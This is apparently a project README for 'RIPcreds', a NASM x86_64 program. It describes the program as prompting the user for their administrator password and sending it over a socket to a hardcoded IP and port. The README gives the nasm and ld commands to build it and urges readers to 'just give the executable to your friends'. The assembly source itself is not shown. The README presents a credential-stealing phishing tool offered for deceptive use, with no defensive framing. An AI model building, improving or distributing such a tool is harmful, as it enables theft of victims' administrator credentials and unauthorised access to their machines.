
NASM that asks the user for their administrator password to continue, then sends the password over a socket. Note IP and port are hardcoded.

Primary LanguageAssembly


NASM that asks the user for their administrator password to continue, then sends the password over a socket. Note IP and port are hardcoded.

To change the hardocded IP and port I have included in the comments a quick way to do so with Python. Note, the null bytes do not matter as much, I got rid of as much as possible, but this would be more standalone x86_64 rather than shellcode you would inject into an executable.

P.S if you dont understand the name of the project RIP = instruction pointer & Rest In Peace ;) P.S if you dont like it, bite me.

Assemble and Link

nasm -felf64 RIPcreds.nasm -o RIPcreds.o

ld RIPcreds.o -o RIPcreds

./RIPcreds ((just give the executable to your friends lol))